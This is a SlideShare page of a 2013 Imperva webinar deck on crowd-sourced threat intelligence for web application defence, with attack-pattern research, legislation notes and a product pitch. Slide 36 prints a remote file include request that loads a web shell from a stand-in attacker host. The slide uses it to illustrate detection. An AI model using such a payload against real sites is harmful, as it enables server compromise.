SlideShare a Scribd company logo

The Value of Crowd-Sourced Threat Intelligence

Imperva
Imperva

On April 3, CNBC reported the details of a large-scale attack campaign targeting the banking industry. As a result of this campaign, multiple U.S. banks experienced website outages totaling 249 hours over a six week period. Would the damage from the attack campaign have been reduced if the banks had the ability to share crowd-sourced threat intelligence? Imperva's Application Defense Center (ADC) recently analyzed real-world traffic from sixty Web applications to identify attack patterns. The results of the study demonstrate how sharing attack patterns across a community of Web applications can significantly mitigate the risk of large-scale attack campaigns. This presentation will: identify how cross-site information sharing (crowd-sourcing) creates security intelligence, demonstrate the value of adding crowd-sourced intelligence to Web application security, and provide real-world examples of attack patterns that can be shared for community defense.

Technology
1 of 38
Download to read offline
© 2013 Imperva, Inc. All rights reserved. Crowd Sourced Threat Intelligence Amichai Shulman, CTO, Imperva Confidential1 May 2013
© 2013 Imperva, Inc. All rights reserved. Agenda Confidential2 §  Introduction to crowd sourcing and threat intelligence §  Application layer threat intelligence •  Research report §  Actionable threat intelligence •  Turning threat intelligence into community defense §  Threat intelligence and legislation •  Pros, Cons and Etat D’Affaire §  Summary & conclusions §  Q&A
© 2013 Imperva, Inc. All rights reserved. Amichai Shulman – CTO Imperva Confidential3 §  Speaker at Industry Events •  RSA, Appsec, Info Security UK, Black Hat §  Lecturer on Information Security •  Technion - Israel Institute of Technology §  Former security consultant to banks & financial services firms §  Leads the Application Defense Center (ADC) •  Discovered over 20 commercial application vulnerabilities §  Credited by Oracle, MS-SQL, IBM and others Amichai Shulman one of InfoWorld’s “Top 25 CTOs”
© 2013 Imperva, Inc. All rights reserved. HII Reports Confidential4 §  Hacker Intelligence Initiative is focused at understanding how attackers are operating in practice •  A different approach from vulnerability research §  Data set composition •  ~60 real world applications •  Anonymous Proxies §  More than 24 months of data §  Powerful analysis system •  Combines analytic tools with drill down capabilities
© 2013 Imperva, Inc. All rights reserved. Introduction Confidential5 Crowd Sourcing and Threat Information Sharing
© 2013 Imperva, Inc. All rights reserved. What is Crowd Sourcing Confidential6 §  “The Wisdom of Crowds: Why the Many Are Smarter Than the Few and How Collective Wisdom Shapes Business, Economies, Societies and Nations”*
© 2013 Imperva, Inc. All rights reserved. Crowd Sourcing in Practice Confidential7
© 2013 Imperva, Inc. All rights reserved. Threat Information Sharing Confidential8 §  AV vendor customers sharing suspicious files with their vendors •  Manual process •  If not manual than how do you define suspicious? §  Anti-spam vendors collecting email data from all deployments •  Privacy? •  Confidentiality §  Customer groups for sharing battle stories •  Timely?
© 2013 Imperva, Inc. All rights reserved. Threat Intelligence Confidential9 §  Infer NEW information regarding future attacks from looking at past attacks §  Attacks across organizations share common characteristics •  Sources •  Techniques •  Tools •  Timelines
© 2013 Imperva, Inc. All rights reserved. Application Layer Threat Intelligence Confidential10 Research report
© 2013 Imperva, Inc. All rights reserved. Some Observations Confidential11 §  Most web attacks are part of large scale industrialized operations •  Reuse of attack platforms •  Reuse of techniques •  Reuse of tools §  Attack campaigns span meaningful time frames
© 2013 Imperva, Inc. All rights reserved. More Observations Confidential12 §  Izzadin Kassam attacks on US banks •  Started with a few banks 4 months ago •  Gradually add more targets to the list §  #OpIsrael / #OpUSA / #OpColombia … •  Attacks by hacktivists •  Targeted for a specific time frame •  Pick up many victims and target them with the SAME exact tools over the attack time frame
© 2013 Imperva, Inc. All rights reserved. Methodology Confidential13 §  Attack data only •  60 applications •  6 months of data §  Analyze dominant attack types •  SQL Injection •  Remote File Include •  Comment Spam •  Local File Include •  Directory Traversal
© 2013 Imperva, Inc. All rights reserved. SQL Injection – Source Threat Quadrant Confidential14 Multi target, persistent sources Multi target sources Persistent sourcesSingletons
© 2013 Imperva, Inc. All rights reserved. SQL Injection – Source Threat Quadrant Confidential15 Multi target, persistent sources
© 2013 Imperva, Inc. All rights reserved. SQL Injection – Time Perspective Confidential16 0 2 4 6 8 10 12 14 16 18 01/01/2013 03/01/2013 05/01/2013 07/01/2013 09/01/2013 11/01/2013 13/01/2013 15/01/2013 17/01/2013 19/01/2013 21/01/2013 23/01/2013 25/01/2013 27/01/2013 29/01/2013 31/01/2013 02/02/2013 04/02/2013 06/02/2013 08/02/2013 10/02/2013 12/02/2013 14/02/2013 16/02/2013 18/02/2013 20/02/2013 22/02/2013 24/02/2013 26/02/2013 28/02/2013 Targets Accumulating Current
© 2013 Imperva, Inc. All rights reserved. Comment Spam – Source Threat Quadrant Confidential17 Multi target, persistent sources
© 2013 Imperva, Inc. All rights reserved. Remote File Include – URL Threat Quadrant Confidential18 Multi target, persistent vectors
© 2013 Imperva, Inc. All rights reserved. Remote File Include - Example Confidential19 §  Reconnaissance campaign based on benign URL •  http://google.com/humans.txt §  11 different applications targeted using the same URL •  5144 different requests §  Spread throughout an entire month §  Next slide shows a network graph of attack sources to targets •  We can learn about the relationship between attack sources
© 2013 Imperva, Inc. All rights reserved. Remote File Include - Example Confidential20
© 2013 Imperva, Inc. All rights reserved. Use of Attack Tools Confidential21 Percentage of Automated Attacks 0% 10% 20% 30% 40% 50% 60% 70% 80% 90% 100% RFI LFI SQLi ComSpm XSS DT Total Attacks Automated
© 2013 Imperva, Inc. All rights reserved. Actionable Threat Intelligence Confidential22 Turning Threat Intelligence Into Community Defense
© 2013 Imperva, Inc. All rights reserved. Actionable Intelligence Life Cycle Confidential23 Known attack patterns Apply on traffic to identify attackers Known attackers Apply on traffic to identify new patterns
© 2013 Imperva, Inc. All rights reserved. Actionable Threat Intelligence Confidential24 §  Multiphase •  Distributed data collection •  Information extraction •  Analysis and knowledge generation •  Knowledge validation •  Distribution of knowledge to devices §  Cycle must be completely automated in order to provide value in a timely manner and at scale •  Not an information sharing hub
© 2013 Imperva, Inc. All rights reserved. The Cost of Decision Making Confidential25 §  Problem scale is increasing •  Number of attacks is constantly growing •  Number of applications per organization is growing §  Resources are stagnant •  No additional HC §  Organizations must reduce the proportion of alerts that require human decision making §  By introducing mechanisms based on actionable intelligence, organizations increase the accuracy of detection with respect to a larger portion of the attacks
© 2013 Imperva, Inc. All rights reserved. Threat Intelligence and Legislation Confidential26 Pros, Cons and Etat D’Affaire
© 2013 Imperva, Inc. All rights reserved. Current Legislation Confidential27 §  US Cyber Intelligence Sharing and Protection Act (CISPA) •  Passed late April 2013 •  Sets up the LEGAL grounds for bilateral information sharing between private sector entities and government entities •  Addresses issues of eligibility, liability and protection of share information
© 2013 Imperva, Inc. All rights reserved. Current Legislation Confidential28 §  UK Cyber Security Information Sharing Partnership (CISP) •  Launched Late March 2013 (piloted through 2012) •  Sets up procedural and technical grounds for information sharing between private sector and government •  Comprises an operations room, reporting portal and program definitions •  Similar program exists for cyber crime (CCRP)
© 2013 Imperva, Inc. All rights reserved. Cons Confidential29 §  Misuse of information by governments •  Invade privacy in various ways •  Otherwise would require court order §  Information sharing platform •  Does not provide for extraction of actionable intelligence §  Governments usually do things the wrong way •  E.g. the complexity of the STIX language
© 2013 Imperva, Inc. All rights reserved. Pros Confidential30 §  Regulate how data is being anonymized and protected §  Encourage more organizations to take part in this effort •  Achieve better results faster •  Reduce overall damage to public §  Standardize on various components
© 2013 Imperva, Inc. All rights reserved. Summary & Conclusions Confidential31
© 2013 Imperva, Inc. All rights reserved. Summary Confidential32 §  Threat intelligence has a measurable potential value for Web application attacks §  Threat intelligence can be used to identify and detect attack sources, attack vectors and attack tools §  Actionable threat intelligence is crucial for exploiting the potential value of threat intelligence •  Not information sharing hubs •  No manual processes §  Actionable threat intelligence helps organizations reduce the cost of security decision making and enables them to handle increasing volumes of attack traffic
© 2013 Imperva, Inc. All rights reserved. ThreatRadar Community Defense Confidential33
© 2013 Imperva, Inc. All rights reserved. ThreatRadar Community Defense 34
© 2013 Imperva, Inc. All rights reserved. ThreatRadar Community Defense 35 ThreatRadar Community Defense §  Gathers live attack data from SecureSphere WAFs around the world §  Distributes attack patterns and reputation data in near-real time
© 2013 Imperva, Inc. All rights reserved. 1. SecureSphere detects a possible RFI attack ThreatRadar Servers Internet User Web Servers 2. Sends event to ThreatRadar Cloud Community Defense – How It Works © Copyright 2012 Imperva, Inc. All rights reserved. 36 /vulnerable.php?C=http://evil.com/webshell.txt? 3. If ThreatRadar verifies site is malicious, it will distribute new RFI pattern to community
© 2013 Imperva, Inc. All rights reserved. Webinar Materials Confidential37 Post-Webinar Discussions Answers to Attendee Questions Webinar Recording Link Join Group Join Imperva LinkedIn Group, Imperva Data Security Direct, for…
© 2013 Imperva, Inc. All rights reserved. www.imperva.com 38 Confidential

Recommended

Big Data Analytics for Cyber Security: A Quick Overview
Big Data Analytics for Cyber Security: A Quick OverviewBig Data Analytics for Cyber Security: A Quick Overview
Big Data Analytics for Cyber Security: A Quick OverviewFemi Ashaye
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
Operational Security Intelligence
Operational Security IntelligenceOperational Security Intelligence
Operational Security IntelligenceSplunk
 
Leverage Big Data for Security Intelligence
Leverage Big Data for Security Intelligence Leverage Big Data for Security Intelligence
Leverage Big Data for Security Intelligence Stefaan Van daele
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightHostway|HOSTING
 
NTXISSACSC1 Conference - Cybersecurity 2014 by Andrea Almeida
NTXISSACSC1 Conference - Cybersecurity 2014 by Andrea AlmeidaNTXISSACSC1 Conference - Cybersecurity 2014 by Andrea Almeida
NTXISSACSC1 Conference - Cybersecurity 2014 by Andrea AlmeidaNorth Texas Chapter of the ISSA
 
User Behavior Analytics And The Benefits To Companies
User Behavior Analytics And The Benefits To CompaniesUser Behavior Analytics And The Benefits To Companies
User Behavior Analytics And The Benefits To CompaniesSpectorsoft
 
The Business Benefits of Threat Intelligence Webinar
The Business Benefits of Threat Intelligence WebinarThe Business Benefits of Threat Intelligence Webinar
The Business Benefits of Threat Intelligence WebinarThreatConnect
 

Recommended

Big Data Analytics for Cyber Security: A Quick Overview
Big Data Analytics for Cyber Security: A Quick OverviewBig Data Analytics for Cyber Security: A Quick Overview
Big Data Analytics for Cyber Security: A Quick OverviewFemi Ashaye
 
Threat Hunting
Threat HuntingThreat Hunting
Threat HuntingSplunk
 
Operational Security Intelligence
Operational Security IntelligenceOperational Security Intelligence
Operational Security IntelligenceSplunk
 
Leverage Big Data for Security Intelligence
Leverage Big Data for Security Intelligence Leverage Big Data for Security Intelligence
Leverage Big Data for Security Intelligence Stefaan Van daele
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightHostway|HOSTING
 
NTXISSACSC1 Conference - Cybersecurity 2014 by Andrea Almeida
NTXISSACSC1 Conference - Cybersecurity 2014 by Andrea AlmeidaNTXISSACSC1 Conference - Cybersecurity 2014 by Andrea Almeida
NTXISSACSC1 Conference - Cybersecurity 2014 by Andrea AlmeidaNorth Texas Chapter of the ISSA
 
User Behavior Analytics And The Benefits To Companies
User Behavior Analytics And The Benefits To CompaniesUser Behavior Analytics And The Benefits To Companies
User Behavior Analytics And The Benefits To CompaniesSpectorsoft
 
The Business Benefits of Threat Intelligence Webinar
The Business Benefits of Threat Intelligence WebinarThe Business Benefits of Threat Intelligence Webinar
The Business Benefits of Threat Intelligence WebinarThreatConnect
 
Sample Incident Response Plan
Sample Incident Response PlanSample Incident Response Plan
Sample Incident Response PlanMatthew J McMahon
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
Building a Next-Generation Security Operations Center (SOC)
Building a Next-Generation Security Operations Center (SOC)Building a Next-Generation Security Operations Center (SOC)
Building a Next-Generation Security Operations Center (SOC)Sqrrl
 
M-Trends® 2013: Attack the Security Gap
M-Trends® 2013: Attack the Security GapM-Trends® 2013: Attack the Security Gap
M-Trends® 2013: Attack the Security GapFireEye, Inc.
 
6 Steps for Operationalizing Threat Intelligence
6 Steps for Operationalizing Threat Intelligence6 Steps for Operationalizing Threat Intelligence
6 Steps for Operationalizing Threat IntelligenceSirius
 
Threat Intelligence in Cyber Risk Programs
Threat Intelligence in Cyber Risk ProgramsThreat Intelligence in Cyber Risk Programs
Threat Intelligence in Cyber Risk ProgramsRahul Neel Mani
 
Beyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountBeyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountImperva
 
CSIRT_16_Jun
CSIRT_16_JunCSIRT_16_Jun
CSIRT_16_JunCandan BOLUKBAS
 
Sqrrl and IBM: Threat Hunting for QRadar Users
Sqrrl and IBM: Threat Hunting for QRadar UsersSqrrl and IBM: Threat Hunting for QRadar Users
Sqrrl and IBM: Threat Hunting for QRadar UsersSqrrl
 
Intelligence driven defense webinar
Intelligence driven defense webinarIntelligence driven defense webinar
Intelligence driven defense webinarThreatConnect
 
RSA: Security Analytics Architecture for APT
RSA: Security Analytics Architecture for APTRSA: Security Analytics Architecture for APT
RSA: Security Analytics Architecture for APTLee Wei Yeong
 
Next generation security analytics
Next generation security analyticsNext generation security analytics
Next generation security analyticsChristian Have
 
Operationalizing Threat Intelligence to Battle Persistent Actors
Operationalizing Threat Intelligence to Battle Persistent ActorsOperationalizing Threat Intelligence to Battle Persistent Actors
Operationalizing Threat Intelligence to Battle Persistent ActorsThreatConnect
 
Review on Event Correlation- مروری بر روش های همبسته سازی در مدیریت رخداد
Review on Event Correlation- مروری بر روش های همبسته سازی در مدیریت رخدادReview on Event Correlation- مروری بر روش های همبسته سازی در مدیریت رخداد
Review on Event Correlation- مروری بر روش های همبسته سازی در مدیریت رخدادReZa AdineH
 
Effective Security Operation Center - present by Reza Adineh
Effective Security Operation Center - present by Reza AdinehEffective Security Operation Center - present by Reza Adineh
Effective Security Operation Center - present by Reza AdinehReZa AdineH
 
Dollars and Sense of Sharing Threat Intelligence
Dollars and Sense of Sharing Threat IntelligenceDollars and Sense of Sharing Threat Intelligence
Dollars and Sense of Sharing Threat IntelligenceThreatConnect
 
Actionable Threat Intelligence
Actionable Threat IntelligenceActionable Threat Intelligence
Actionable Threat IntelligenceOWASP Delhi
 
The Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat IntelligenceThe Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat IntelligenceThreatConnect
 
CYBER THREAT FORCAST 2016
CYBER THREAT FORCAST 2016 CYBER THREAT FORCAST 2016
CYBER THREAT FORCAST 2016 Bolaji James Bankole CCSS,CEH,MCSA,MCSE,MCP,CCNA,
 
Big Data Security Analytics (BDSA) with Randy Franklin
Big Data Security Analytics (BDSA) with Randy FranklinBig Data Security Analytics (BDSA) with Randy Franklin
Big Data Security Analytics (BDSA) with Randy FranklinSridhar Karnam
 
Top Security Trends for 2014
Top Security Trends for 2014Top Security Trends for 2014
Top Security Trends for 2014Imperva
 
Detect & Remediate Malware & Advanced Targeted Attacks
Detect & Remediate Malware & Advanced Targeted AttacksDetect & Remediate Malware & Advanced Targeted Attacks
Detect & Remediate Malware & Advanced Targeted AttacksImperva
 

More Related Content

What's hot

Sample Incident Response Plan
Sample Incident Response PlanSample Incident Response Plan
Sample Incident Response PlanMatthew J McMahon
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceVishal Kumar
 
Building a Next-Generation Security Operations Center (SOC)
Building a Next-Generation Security Operations Center (SOC)Building a Next-Generation Security Operations Center (SOC)
Building a Next-Generation Security Operations Center (SOC)Sqrrl
 
M-Trends® 2013: Attack the Security Gap
M-Trends® 2013: Attack the Security GapM-Trends® 2013: Attack the Security Gap
M-Trends® 2013: Attack the Security GapFireEye, Inc.
 
6 Steps for Operationalizing Threat Intelligence
6 Steps for Operationalizing Threat Intelligence6 Steps for Operationalizing Threat Intelligence
6 Steps for Operationalizing Threat IntelligenceSirius
 
Threat Intelligence in Cyber Risk Programs
Threat Intelligence in Cyber Risk ProgramsThreat Intelligence in Cyber Risk Programs
Threat Intelligence in Cyber Risk ProgramsRahul Neel Mani
 
Beyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountBeyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountImperva
 
Sqrrl and IBM: Threat Hunting for QRadar Users
Sqrrl and IBM: Threat Hunting for QRadar UsersSqrrl and IBM: Threat Hunting for QRadar Users
Sqrrl and IBM: Threat Hunting for QRadar UsersSqrrl
 
Intelligence driven defense webinar
Intelligence driven defense webinarIntelligence driven defense webinar
Intelligence driven defense webinarThreatConnect
 
RSA: Security Analytics Architecture for APT
RSA: Security Analytics Architecture for APTRSA: Security Analytics Architecture for APT
RSA: Security Analytics Architecture for APTLee Wei Yeong
 
Next generation security analytics
Next generation security analyticsNext generation security analytics
Next generation security analyticsChristian Have
 
Operationalizing Threat Intelligence to Battle Persistent Actors
Operationalizing Threat Intelligence to Battle Persistent ActorsOperationalizing Threat Intelligence to Battle Persistent Actors
Operationalizing Threat Intelligence to Battle Persistent ActorsThreatConnect
 
Review on Event Correlation- مروری بر روش های همبسته سازی در مدیریت رخداد
Review on Event Correlation- مروری بر روش های همبسته سازی در مدیریت رخدادReview on Event Correlation- مروری بر روش های همبسته سازی در مدیریت رخداد
Review on Event Correlation- مروری بر روش های همبسته سازی در مدیریت رخدادReZa AdineH
 
Effective Security Operation Center - present by Reza Adineh
Effective Security Operation Center - present by Reza AdinehEffective Security Operation Center - present by Reza Adineh
Effective Security Operation Center - present by Reza AdinehReZa AdineH
 
Dollars and Sense of Sharing Threat Intelligence
Dollars and Sense of Sharing Threat IntelligenceDollars and Sense of Sharing Threat Intelligence
Dollars and Sense of Sharing Threat IntelligenceThreatConnect
 
Actionable Threat Intelligence
Actionable Threat IntelligenceActionable Threat Intelligence
Actionable Threat IntelligenceOWASP Delhi
 
The Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat IntelligenceThe Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat IntelligenceThreatConnect
 
Big Data Security Analytics (BDSA) with Randy Franklin
Big Data Security Analytics (BDSA) with Randy FranklinBig Data Security Analytics (BDSA) with Randy Franklin
Big Data Security Analytics (BDSA) with Randy FranklinSridhar Karnam
 

What's hot (20)

Sample Incident Response Plan
Sample Incident Response PlanSample Incident Response Plan
Sample Incident Response Plan
 
Threat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement MatriceThreat Hunting Procedures and Measurement Matrice
Threat Hunting Procedures and Measurement Matrice
 
Building a Next-Generation Security Operations Center (SOC)
Building a Next-Generation Security Operations Center (SOC)Building a Next-Generation Security Operations Center (SOC)
Building a Next-Generation Security Operations Center (SOC)
 
M-Trends® 2013: Attack the Security Gap
M-Trends® 2013: Attack the Security GapM-Trends® 2013: Attack the Security Gap
M-Trends® 2013: Attack the Security Gap
 
6 Steps for Operationalizing Threat Intelligence
6 Steps for Operationalizing Threat Intelligence6 Steps for Operationalizing Threat Intelligence
6 Steps for Operationalizing Threat Intelligence
 
Threat Intelligence in Cyber Risk Programs
Threat Intelligence in Cyber Risk ProgramsThreat Intelligence in Cyber Risk Programs
Threat Intelligence in Cyber Risk Programs
 
Beyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked accountBeyond takeover: stories from a hacked account
Beyond takeover: stories from a hacked account
 
CSIRT_16_Jun
CSIRT_16_JunCSIRT_16_Jun
CSIRT_16_Jun
 
Sqrrl and IBM: Threat Hunting for QRadar Users
Sqrrl and IBM: Threat Hunting for QRadar UsersSqrrl and IBM: Threat Hunting for QRadar Users
Sqrrl and IBM: Threat Hunting for QRadar Users
 
Intelligence driven defense webinar
Intelligence driven defense webinarIntelligence driven defense webinar
Intelligence driven defense webinar
 
RSA: Security Analytics Architecture for APT
RSA: Security Analytics Architecture for APTRSA: Security Analytics Architecture for APT
RSA: Security Analytics Architecture for APT
 
Next generation security analytics
Next generation security analyticsNext generation security analytics
Next generation security analytics
 
Operationalizing Threat Intelligence to Battle Persistent Actors
Operationalizing Threat Intelligence to Battle Persistent ActorsOperationalizing Threat Intelligence to Battle Persistent Actors
Operationalizing Threat Intelligence to Battle Persistent Actors
 
Review on Event Correlation- مروری بر روش های همبسته سازی در مدیریت رخداد
Review on Event Correlation- مروری بر روش های همبسته سازی در مدیریت رخدادReview on Event Correlation- مروری بر روش های همبسته سازی در مدیریت رخداد
Review on Event Correlation- مروری بر روش های همبسته سازی در مدیریت رخداد
 
Effective Security Operation Center - present by Reza Adineh
Effective Security Operation Center - present by Reza AdinehEffective Security Operation Center - present by Reza Adineh
Effective Security Operation Center - present by Reza Adineh
 
Dollars and Sense of Sharing Threat Intelligence
Dollars and Sense of Sharing Threat IntelligenceDollars and Sense of Sharing Threat Intelligence
Dollars and Sense of Sharing Threat Intelligence
 
Actionable Threat Intelligence
Actionable Threat IntelligenceActionable Threat Intelligence
Actionable Threat Intelligence
 
The Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat IntelligenceThe Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat Intelligence
 
CYBER THREAT FORCAST 2016
CYBER THREAT FORCAST 2016 CYBER THREAT FORCAST 2016
CYBER THREAT FORCAST 2016
 
Big Data Security Analytics (BDSA) with Randy Franklin
Big Data Security Analytics (BDSA) with Randy FranklinBig Data Security Analytics (BDSA) with Randy Franklin
Big Data Security Analytics (BDSA) with Randy Franklin
 

Similar to The Value of Crowd-Sourced Threat Intelligence

Top Security Trends for 2014
Top Security Trends for 2014Top Security Trends for 2014
Top Security Trends for 2014Imperva
 
Detect & Remediate Malware & Advanced Targeted Attacks
Detect & Remediate Malware & Advanced Targeted AttacksDetect & Remediate Malware & Advanced Targeted Attacks
Detect & Remediate Malware & Advanced Targeted AttacksImperva
 
A Blueprint for Web Attack Survival
A Blueprint for Web Attack SurvivalA Blueprint for Web Attack Survival
A Blueprint for Web Attack SurvivalImperva
 
Hiding in Plain Sight: The Danger of Known Vulnerabilities
Hiding in Plain Sight: The Danger of Known VulnerabilitiesHiding in Plain Sight: The Danger of Known Vulnerabilities
Hiding in Plain Sight: The Danger of Known VulnerabilitiesImperva
 
Protecting health and life science organizations from breaches and ransomware
Protecting health and life science organizations from breaches and ransomwareProtecting health and life science organizations from breaches and ransomware
Protecting health and life science organizations from breaches and ransomwareCloudera, Inc.
 
Enhancing Your Security Infrastructure with Infoblox Threat Intelligence Webinar
Enhancing Your Security Infrastructure with Infoblox Threat Intelligence WebinarEnhancing Your Security Infrastructure with Infoblox Threat Intelligence Webinar
Enhancing Your Security Infrastructure with Infoblox Threat Intelligence WebinarAdelaide Hill
 
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced ThreatsGood Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced ThreatsZivaro Inc
 
Why Depending On Malware Prevention Alone Is No Longer An Option
Why Depending On Malware Prevention Alone Is No Longer An Option Why Depending On Malware Prevention Alone Is No Longer An Option
Why Depending On Malware Prevention Alone Is No Longer An Option Seculert
 
Security Testing for Test Professionals
Security Testing for Test ProfessionalsSecurity Testing for Test Professionals
Security Testing for Test ProfessionalsTechWell
 
Top Cyber Security Trends for 2016
Top Cyber Security Trends for 2016Top Cyber Security Trends for 2016
Top Cyber Security Trends for 2016Imperva
 
SAM05_Barber PW (7-9-15)
SAM05_Barber PW (7-9-15)SAM05_Barber PW (7-9-15)
SAM05_Barber PW (7-9-15)Norm Barber
 
Scalar Security Roadshow - Calgary Presentation
Scalar Security Roadshow - Calgary PresentationScalar Security Roadshow - Calgary Presentation
Scalar Security Roadshow - Calgary PresentationScalar Decisions
 
Developing a 360° view of risk and compliance
Developing a 360° view of risk and complianceDeveloping a 360° view of risk and compliance
Developing a 360° view of risk and complianceInuit AB
 
Scalar Security Roadshow - Vancouver Presentation
Scalar Security Roadshow - Vancouver PresentationScalar Security Roadshow - Vancouver Presentation
Scalar Security Roadshow - Vancouver PresentationScalar Decisions
 
Security Testing for Testing Professionals
Security Testing for Testing ProfessionalsSecurity Testing for Testing Professionals
Security Testing for Testing ProfessionalsTechWell
 
IT Security Management -- People, Procedures and Tools
IT Security Management -- People, Procedures and ToolsIT Security Management -- People, Procedures and Tools
IT Security Management -- People, Procedures and ToolsAndrew S. Baker (ASB)
 
Scalar Security Roadshow - Ottawa Presentation
Scalar Security Roadshow - Ottawa PresentationScalar Security Roadshow - Ottawa Presentation
Scalar Security Roadshow - Ottawa PresentationScalar Decisions
 
SCADA Security Webinar
SCADA Security WebinarSCADA Security Webinar
SCADA Security WebinarAVEVA
 
The Anatomy of a Cloud Security Breach
The Anatomy of a Cloud Security BreachThe Anatomy of a Cloud Security Breach
The Anatomy of a Cloud Security BreachCloudLock
 

Similar to The Value of Crowd-Sourced Threat Intelligence (20)

Top Security Trends for 2014
Top Security Trends for 2014Top Security Trends for 2014
Top Security Trends for 2014
 
Detect & Remediate Malware & Advanced Targeted Attacks
Detect & Remediate Malware & Advanced Targeted AttacksDetect & Remediate Malware & Advanced Targeted Attacks
Detect & Remediate Malware & Advanced Targeted Attacks
 
A Blueprint for Web Attack Survival
A Blueprint for Web Attack SurvivalA Blueprint for Web Attack Survival
A Blueprint for Web Attack Survival
 
Hiding in Plain Sight: The Danger of Known Vulnerabilities
Hiding in Plain Sight: The Danger of Known VulnerabilitiesHiding in Plain Sight: The Danger of Known Vulnerabilities
Hiding in Plain Sight: The Danger of Known Vulnerabilities
 
Protecting health and life science organizations from breaches and ransomware
Protecting health and life science organizations from breaches and ransomwareProtecting health and life science organizations from breaches and ransomware
Protecting health and life science organizations from breaches and ransomware
 
Application Hackers Have A Handbook. Why Shouldn't You?
Application Hackers Have A Handbook. Why Shouldn't You?Application Hackers Have A Handbook. Why Shouldn't You?
Application Hackers Have A Handbook. Why Shouldn't You?
 
Enhancing Your Security Infrastructure with Infoblox Threat Intelligence Webinar
Enhancing Your Security Infrastructure with Infoblox Threat Intelligence WebinarEnhancing Your Security Infrastructure with Infoblox Threat Intelligence Webinar
Enhancing Your Security Infrastructure with Infoblox Threat Intelligence Webinar
 
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced ThreatsGood Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
Good Guys vs Bad Guys: Using Big Data to Counteract Advanced Threats
 
Why Depending On Malware Prevention Alone Is No Longer An Option
Why Depending On Malware Prevention Alone Is No Longer An Option Why Depending On Malware Prevention Alone Is No Longer An Option
Why Depending On Malware Prevention Alone Is No Longer An Option
 
Security Testing for Test Professionals
Security Testing for Test ProfessionalsSecurity Testing for Test Professionals
Security Testing for Test Professionals
 
Top Cyber Security Trends for 2016
Top Cyber Security Trends for 2016Top Cyber Security Trends for 2016
Top Cyber Security Trends for 2016
 
SAM05_Barber PW (7-9-15)
SAM05_Barber PW (7-9-15)SAM05_Barber PW (7-9-15)
SAM05_Barber PW (7-9-15)
 
Scalar Security Roadshow - Calgary Presentation
Scalar Security Roadshow - Calgary PresentationScalar Security Roadshow - Calgary Presentation
Scalar Security Roadshow - Calgary Presentation
 
Developing a 360° view of risk and compliance
Developing a 360° view of risk and complianceDeveloping a 360° view of risk and compliance
Developing a 360° view of risk and compliance
 
Scalar Security Roadshow - Vancouver Presentation
Scalar Security Roadshow - Vancouver PresentationScalar Security Roadshow - Vancouver Presentation
Scalar Security Roadshow - Vancouver Presentation
 
Security Testing for Testing Professionals
Security Testing for Testing ProfessionalsSecurity Testing for Testing Professionals
Security Testing for Testing Professionals
 
IT Security Management -- People, Procedures and Tools
IT Security Management -- People, Procedures and ToolsIT Security Management -- People, Procedures and Tools
IT Security Management -- People, Procedures and Tools
 
Scalar Security Roadshow - Ottawa Presentation
Scalar Security Roadshow - Ottawa PresentationScalar Security Roadshow - Ottawa Presentation
Scalar Security Roadshow - Ottawa Presentation
 
SCADA Security Webinar
SCADA Security WebinarSCADA Security Webinar
SCADA Security Webinar
 
The Anatomy of a Cloud Security Breach
The Anatomy of a Cloud Security BreachThe Anatomy of a Cloud Security Breach
The Anatomy of a Cloud Security Breach
 

More from Imperva

Cybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 SurveyCybersecurity and Healthcare - HIMSS 2018 Survey
Cybersecurity and Healthcare - HIMSS 2018 SurveyImperva
 
API Security Survey
API Security SurveyAPI Security Survey
API Security SurveyImperva
 
Imperva ppt
Imperva pptImperva ppt
Imperva pptImperva
 
Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds Research: From zero to phishing in 60 seconds
Research: From zero to phishing in 60 seconds Imperva
 
Making Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to NarrativesMaking Sense of Web Attacks: From Alerts to Narratives
Making Sense of Web Attacks: From Alerts to NarrativesImperva
 
How We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over LunchHow We Blocked a 650Gb DDoS Attack Over Lunch
How We Blocked a 650Gb DDoS Attack Over LunchImperva
 
Survey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber SecuritySurvey: Insider Threats and Cyber Security
Survey: Insider Threats and Cyber SecurityImperva
 
Companies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPRCompanies Aware, but Not Prepared for GDPR
Companies Aware, but Not Prepared for GDPRImperva
 
Rise of Ransomware
Rise of Ransomware Rise of Ransomware
Rise of Ransomware Imperva
 
